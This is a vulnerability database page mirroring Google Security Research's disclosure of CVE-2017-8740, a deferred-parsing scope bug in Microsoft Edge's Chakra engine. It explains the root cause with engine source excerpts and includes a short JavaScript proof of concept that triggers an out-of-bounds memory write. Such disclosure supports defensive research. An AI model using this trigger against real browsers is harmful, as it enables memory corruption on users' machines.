Microsoft Edge Charka Wrong Scopes In Deferred Parsing

🗓️ 22 Sep 2017 00:00:00Reported by Google Security ResearchType

packetstorm🔗 packetstormsecurity.com👁 38 Views

Microsoft Edge: Chakra: Deferred parsing issu

Reporter	Title	Published	Views	Family All 27
0day.today	Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes Exploit	21 Sep 201700:00	–	zdt
BDU FSTEC	Microsoft Edge browser’s vulnerability, related to improper handling of objects in memory, allows a hacker to execute arbitrary code.	17 Oct 201700:00	–	bdu_fstec
Circl	CVE-2017-8740	21 Sep 201700:00	–	circl
CNVD	Microsoft Edge Memory Corruption Vulnerability (CNVD-2017-28318)	13 Sep 201700:00	–	cnvd
CVE	CVE-2017-8740	13 Sep 201701:00	–	cve
Cvelist	CVE-2017-8740	13 Sep 201701:00	–	cvelist
Microsoft KB	September 12, 2017—KB4038788 (OS Build 15063.608)	12 Sep 201707:00	–	mskb
Kaspersky	KLA11098 Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer	12 Sep 201700:00	–	kaspersky
Microsoft CVE	Scripting Engine Memory Corruption Vulnerability	12 Sep 201707:00	–	mscve
NVD	CVE-2017-8740	13 Sep 201701:29	–	nvd

`Microsoft Edge: Chakra: Deferred parsing makes wrong scopes   
  
CVE-2017-8740  
  
  
(function f(a = (function () {  
print(a);  
with ({});  
})()) {  
function g() {  
f;  
}  
})();  
  
When Chakra executes the above code, it doesn't generate bytecode for "g". This is a feature called "DeferParse". The problem is that the bytecode generated for "f" when the feature is enabled is different to the bytecode generated when the feature is disabled. This is because of "ByteCodeGenerator::ProcessScopeWithCapturedSym" which changes the function expression scope's type is not called when the feature is enabled.  
  
Here's a snippet of the method which emits an incorrect opcode.  
void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)  
{  
...  
if (funcExprWithName)  
{  
if (funcInfo->GetFuncExprNameReference() ||  
(funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))  
{  
...  
Js::RegSlot ldFuncExprDst = sym->GetLocation();  
this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);  
  
if (sym->IsInSlot(funcInfo))  
{  
Js::RegSlot scopeLocation;  
AnalysisAssert(funcInfo->funcExprScope);  
  
if (funcInfo->funcExprScope->GetIsObject())  
{  
scopeLocation = funcInfo->funcExprScope->GetLocation();  
this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,  
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));  
}  
else if (funcInfo->bodyScope->GetIsObject())  
{  
this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),  
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));  
}  
else  
{  
Assert(sym->HasScopeSlot());  
this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),  
sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);  
}  
}  
...  
}  
}  
...  
}  
  
As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".  
Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.  
But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".  
  
The feature is enabled in Edge by default.  
  
PoC:  
let h = function f(a0 = (function () {  
a0;  
a1;  
a2;  
a3;  
a4;  
a5;  
a6;  
a7 = 0x99999; // oob write  
  
with ({});  
})(), a1, a2, a3, a4, a5, a6, a7) {  
function g() {  
f;  
}  
};  
  
for (let i = 0; i < 0x10000; i++) {  
h();  
}  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

22 Sep 2017 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.72171